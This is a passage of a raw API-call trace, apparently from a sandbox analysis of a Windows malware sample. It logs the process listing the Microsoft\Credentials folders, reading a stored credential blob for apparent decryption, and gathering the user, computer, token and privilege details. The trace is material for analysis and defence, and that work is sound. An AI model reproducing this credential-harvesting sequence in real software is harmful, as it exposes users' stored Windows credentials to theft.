pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0067.456] GetProcessHeap () returned 0x620000 [0067.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f70) returned 0x643d58 [0067.457] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0067.458] wvsprintfW (in: param_1=0x643d58, param_2="%s\\Microsoft\\Credentials", arglist=0x19fb80 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials") returned 59 [0067.458] GetProcessHeap () returned 0x620000 [0067.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7a) returned 0x63cc48 [0067.458] GetProcessHeap () returned 0x620000 [0067.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643d58 | out: hHeap=0x620000) returned 1 [0067.459] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0067.459] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials") returned 1 [0067.459] GetProcessHeap () returned 0x620000 [0067.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d420 | out: hHeap=0x620000) returned 1 [0067.461] Sleep (dwMilliseconds=0xa) [0067.480] GetProcessHeap () returned 0x620000 [0067.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f48) returned 0x643d58 [0067.481] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0067.482] wvsprintfW (in: param_1=0x643d58, param_2="%s\\*", arglist=0x19f904 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned 61 [0067.482] GetProcessHeap () returned 0x620000 [0067.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7e) returned 0x642928 [0067.482] GetProcessHeap () returned 0x620000 [0067.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643d58 | out: hHeap=0x620000) returned 1 [0067.483] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\credentials\\*"), lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x62d710 [0067.484] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0067.484] StrStrW (lpFirst=".", lpSrch="Windows") returned 0x0 [0067.485] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0067.485] StrStrW (lpFirst=".", lpSrch="Program Files") returned 0x0 [0067.486] FindNextFileW (in: hFindFile=0x62d710, lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.487] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0067.487] StrStrW (lpFirst="..", lpSrch="Windows") returned 0x0 [0067.488] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0067.489] StrStrW (lpFirst="..", lpSrch="Program Files") returned 0x0 [0067.489] FindNextFileW (in: hFindFile=0x62d710, lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0067.489] FindClose (in: hFindFile=0x62d710 | out: hFindFile=0x62d710) returned 1 [0067.489] GetProcessHeap () returned 0x620000 [0067.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642928 | out: hHeap=0x620000) returned 1 [0067.490] GetProcessHeap () returned 0x620000 [0067.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x643d58 [0067.491] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0067.492] wvsprintfW (in: param_1=0x643d58, param_2="%s\\%s", arglist=0x19f900 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned 61 [0067.492] GetProcessHeap () returned 0x620000 [0067.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7e) returned 0x642928 [0067.492] GetProcessHeap () returned 0x620000 [0067.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643d58 | out: hHeap=0x620000) returned 1 [0067.493] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\credentials\\*"), lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x62d210 [0067.493] FindNextFileW (in: hFindFile=0x62d210, lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.494] FindNextFileW (in: hFindFile=0x62d210, lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0067.494] FindClose (in: hFindFile=0x62d210 | out: hFindFile=0x62d210) returned 1 [0067.494] GetProcessHeap () returned 0x620000 [0067.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642928 | out: hHeap=0x620000) returned 1 [0067.495] GetProcessHeap () returned 0x620000 [0067.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cc48 | out: hHeap=0x620000) returned 1 [0067.495] GetProcessHeap () returned 0x620000 [0067.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63d420 [0067.496] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0067.497] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x63d420 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0067.497] GetProcessHeap () returned 0x620000 [0067.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f70) returned 0x643d58 [0067.497] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0067.498] wvsprintfW (in: param_1=0x643d58, param_2="%s\\Microsoft\\Credentials", arglist=0x19fb68 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials") returned 57 [0067.498] GetProcessHeap () returned 0x620000 [0067.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x6371a0 [0067.498] GetProcessHeap () returned 0x620000 [0067.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643d58 | out: hHeap=0x620000) returned 1 [0067.499] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0067.500] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials") returned 1 [0067.500] GetProcessHeap () returned 0x620000 [0067.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d420 | out: hHeap=0x620000) returned 1 [0067.501] Sleep (dwMilliseconds=0xa) [0067.684] GetProcessHeap () returned 0x620000 [0067.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f48) returned 0x643d58 [0067.685] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0067.686] wvsprintfW (in: param_1=0x643d58, param_2="%s\\*", arglist=0x19f8ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\*") returned 59 [0067.686] GetProcessHeap () returned 0x620000 [0067.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7a) returned 0x63cc48 [0067.686] GetProcessHeap () returned 0x620000 [0067.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643d58 | out: hHeap=0x620000) returned 1 [0067.687] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\credentials\\*"), lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x82fb51b0, ftLastAccessTime.dwHighDateTime=0x1d8a649, ftLastWriteTime.dwLowDateTime=0x82fb51b0, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x62d710 [0067.687] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0067.688] StrStrW (lpFirst=".", lpSrch="Windows") returned 0x0 [0067.688] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0067.689] StrStrW (lpFirst=".", lpSrch="Program Files") returned 0x0 [0067.689] FindNextFileW (in: hFindFile=0x62d710, lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x82fb51b0, ftLastAccessTime.dwHighDateTime=0x1d8a649, ftLastWriteTime.dwLowDateTime=0x82fb51b0, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.689] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0067.690] StrStrW (lpFirst="..", lpSrch="Windows") returned 0x0 [0067.690] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0067.691] StrStrW (lpFirst="..", lpSrch="Program Files") returned 0x0 [0067.691] FindNextFileW (in: hFindFile=0x62d710, lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x508b12b7, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x82fb3e5e, ftLastAccessTime.dwHighDateTime=0x1d8a649, ftLastWriteTime.dwLowDateTime=0x82fba0be, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x2ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DFBE70A7E5CC19A398EBF1B96859CE5D", cAlternateFileName="DFBE70~1")) returned 1 [0067.691] FindNextFileW (in: hFindFile=0x62d710, lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x508b12b7, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x82fb3e5e, ftLastAccessTime.dwHighDateTime=0x1d8a649, ftLastWriteTime.dwLowDateTime=0x82fba0be, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x2ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DFBE70A7E5CC19A398EBF1B96859CE5D", cAlternateFileName="DFBE70~1")) returned 0 [0067.691] FindClose (in: hFindFile=0x62d710 | out: hFindFile=0x62d710) returned 1 [0067.692] GetProcessHeap () returned 0x620000 [0067.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cc48 | out: hHeap=0x620000) returned 1 [0067.692] GetProcessHeap () returned 0x620000 [0067.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x643d58 [0067.693] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0067.693] wvsprintfW (in: param_1=0x643d58, param_2="%s\\%s", arglist=0x19f8e8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\*") returned 59 [0067.693] GetProcessHeap () returned 0x620000 [0067.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7a) returned 0x63cc48 [0067.693] GetProcessHeap () returned 0x620000 [0067.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643d58 | out: hHeap=0x620000) returned 1 [0067.694] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\credentials\\*"), lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x82fb51b0, ftLastAccessTime.dwHighDateTime=0x1d8a649, ftLastWriteTime.dwLowDateTime=0x82fb51b0, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x62d710 [0067.695] FindNextFileW (in: hFindFile=0x62d710, lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x82fb51b0, ftLastAccessTime.dwHighDateTime=0x1d8a649, ftLastWriteTime.dwLowDateTime=0x82fb51b0, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.695] FindNextFileW (in: hFindFile=0x62d710, lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x508b12b7, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x82fb3e5e, ftLastAccessTime.dwHighDateTime=0x1d8a649, ftLastWriteTime.dwLowDateTime=0x82fba0be, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x2ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DFBE70A7E5CC19A398EBF1B96859CE5D", cAlternateFileName="DFBE70~1")) returned 1 [0067.695] GetProcessHeap () returned 0x620000 [0067.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x643d58 [0067.695] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0067.696] wvsprintfW (in: param_1=0x643d58, param_2="%s\\%s", arglist=0x19f8e8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D") returned 90 [0067.696] GetProcessHeap () returned 0x620000 [0067.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb8) returned 0x642928 [0067.696] GetProcessHeap () returned 0x620000 [0067.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643d58 | out: hHeap=0x620000) returned 1 [0067.697] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0067.697] StrStrW (lpFirst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D", lpSrch="_dec") returned 0x0 [0067.697] GetProcessHeap () returned 0x620000 [0067.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4c) returned 0x643d58 [0067.698] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0067.699] wvsprintfW (in: param_1=0x643d58, param_2="%s_dec", arglist=0x19f670 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D_dec") returned 94 [0067.699] GetProcessHeap () returned 0x620000 [0067.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x63a6e0 [0067.699] GetProcessHeap () returned 0x620000 [0067.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643d58 | out: hHeap=0x620000) returned 1 [0067.699] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\credentials\\dfbe70a7e5cc19a398ebf1b96859ce5d"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0067.700] GetFileSize (in: hFile=0x268, lpFileSizeHigh=0x19f654 | out: lpFileSizeHigh=0x19f654*=0x0) returned 0x2ac0 [0067.701] VirtualAlloc (lpAddress=0x0, dwSize=0x2ac0, flAllocationType=0x1000, flProtect=0x4) returned 0x1f0000 [0067.702] ReadFile (in: hFile=0x268, lpBuffer=0x1f0000, nNumberOfBytesToRead=0x2ac0, lpNumberOfBytesRead=0x19f650, lpOverlapped=0x0 | out: lpBuffer=0x1f0000*, lpNumberOfBytesRead=0x19f650*=0x2ac0, lpOverlapped=0x0) returned 1 [0067.703] CloseHandle (hObject=0x268) returned 1 [0067.714] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.715] GetProcessHeap () returned 0x620000 [0067.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0067.715] GetProcessHeap () returned 0x620000 [0067.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642928 | out: hHeap=0x620000) returned 1 [0067.715] FindNextFileW (in: hFindFile=0x62d710, lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x508b12b7, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x82fb3e5e, ftLastAccessTime.dwHighDateTime=0x1d8a649, ftLastWriteTime.dwLowDateTime=0x82fba0be, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x2ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DFBE70A7E5CC19A398EBF1B96859CE5D", cAlternateFileName="DFBE70~1")) returned 0 [0067.716] FindClose (in: hFindFile=0x62d710 | out: hFindFile=0x62d710) returned 1 [0067.716] GetProcessHeap () returned 0x620000 [0067.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cc48 | out: hHeap=0x620000) returned 1 [0067.716] GetProcessHeap () returned 0x620000 [0067.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6371a0 | out: hHeap=0x620000) returned 1 [0067.717] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.lck" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.lck")) returned 1 [0067.718] GetProcessHeap () returned 0x620000 [0067.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x637b20 | out: hHeap=0x620000) returned 1 [0067.719] GetProcessHeap () returned 0x620000 [0067.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1388) returned 0x63b6b0 [0067.719] GetProcessHeap () returned 0x620000 [0067.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x63ea60 [0067.719] GetProcessHeap () returned 0x620000 [0067.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11c) returned 0x63a6e0 [0067.719] RtlGetVersion (in: lpVersionInformation=0x63a6e0 | out: lpVersionInformation=0x63a6e0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0067.720] GetProcessHeap () returned 0x620000 [0067.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0067.720] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19fb18 | out: lpSystemTimeAsFileTime=0x19fb18*(dwLowDateTime=0xfe7f19fa, dwHighDateTime=0x1d900af)) [0067.720] GetProcessHeap () returned 0x620000 [0067.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7) returned 0x63b500 [0067.720] GetProcessHeap () returned 0x620000 [0067.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63d420 [0067.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.734] GetUserNameW (in: lpBuffer=0x63d420, pcbBuffer=0x19fb74 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fb74) returned 1 [0067.735] GetProcessHeap () returned 0x620000 [0067.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d420 | out: hHeap=0x620000) returned 1 [0067.736] GetProcessHeap () returned 0x620000 [0067.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63d420 [0067.736] GetComputerNameW (in: lpBuffer=0x63d420, nSize=0x19fb74 | out: lpBuffer="XC64ZB", nSize=0x19fb74) returned 1 [0067.736] GetProcessHeap () returned 0x620000 [0067.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d420 | out: hHeap=0x620000) returned 1 [0067.737] GetCurrentThread () returned 0xfffffffe [0067.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.738] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x19fb74 | out: TokenHandle=0x19fb74*=0x0) returned 0 [0067.738] GetLastError () returned 0x3f0 [0067.739] GetCurrentProcess () returned 0xffffffff [0067.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.740] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fb74 | out: TokenHandle=0x19fb74*=0x254) returned 1 [0067.740] GetProcessHeap () returned 0x620000 [0067.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63d420 [0067.740] GetProcessHeap () returned 0x620000 [0067.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x641e78 [0067.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.741] GetTokenInformation (in: TokenHandle=0x254, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19fb70 | out: TokenInformation=0x0, ReturnLength=0x19fb70) returned 0 [0067.741] GetProcessHeap () returned 0x620000 [0067.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6392a8 [0067.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.742] GetTokenInformation (in: TokenHandle=0x254, TokenInformationClass=0x1, TokenInformation=0x6392a8, TokenInformationLength=0x24, ReturnLength=0x19fb70 | out: TokenInformation=0x6392a8, ReturnLength=0x19fb70) returned 1 [0067.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.743] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x6392b0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), Name=0x63d420, cchName=0x19fb60, ReferencedDomainName=0x641e78, cchReferencedDomainName=0x19fb64, peUse=0x19fb5c | out: Name="RDhJ0CNFevzX", cchName=0x19fb60, ReferencedDomainName="XC64ZB", cchReferencedDomainName=0x19fb64, peUse=0x19fb5c) returned 1 [0067.745] GetProcessHeap () returned 0x620000 [0067.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f44) returned 0x644560 [0067.745] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0067.746] wvsprintfW (in: param_1=0x644560, param_2="%s", arglist=0x19fb4c | out: param_1="XC64ZB") returned 6 [0067.746] GetProcessHeap () returned 0x620000 [0067.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb68 [0067.746] GetProcessHeap () returned 0x620000 [0067.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0067.747] GetProcessHeap () returned 0x620000 [0067.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6392a8 | out: hHeap=0x620000) returned 1 [0067.747] CloseHandle (hObject=0x254) returned 1 [0067.747] GetProcessHeap () returned 0x620000 [0067.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x641e78 | out: hHeap=0x620000) returned 1 [0067.748] GetProcessHeap () returned 0x620000 [0067.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d420 | out: hHeap=0x620000) returned 1 [0067.748] GetProcessHeap () returned 0x620000 [0067.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb68 | out: hHeap=0x620000) returned 1 [0067.748] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0067.749] GetDesktopWindow () returned 0x10010 [0067.749] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0067.750] GetWindowRect (in: hWnd=0x10010, lpRect=0x19fb68 | out: lpRect=0x19fb68) returned 1 [0067.750] GetProcessHeap () returned 0x620000 [0067.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x63b6a0 [0067.750] GetProcessHeap () returned 0x620000 [0067.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6a0 | out: hHeap=0x620000) returned 1 [0067.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.751] GetUserNameW (in: lpBuffer=0x19f968, pcbBuffer=0x19fb70 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fb70) returned 1 [0067.752] LoadLibraryW (lpLibFileName="NETAPI32") returned 0x76dd0000 [0067.753] GetProcAddress (hModule=0x76dd0000, lpProcName="NetUserGetInfo") returned 0x701933a0 [0067.753] NetUserGetInfo (in: servername=0x0, username="RDhJ0CNFevzX", level=0x1, bufptr=0x19fb74 | out: bufptr=0x643440*(usri1_name="RDhJ0CNFevzX", usri1_password=0x0, usri1_password_age=0x118c89d, usri1_priv=0x2, usri1_home_dir="", usri1_comment="", usri1_flags=0x10201, usri1_script_path="")) returned 0x0 [0067.760] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.760] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19fb60, 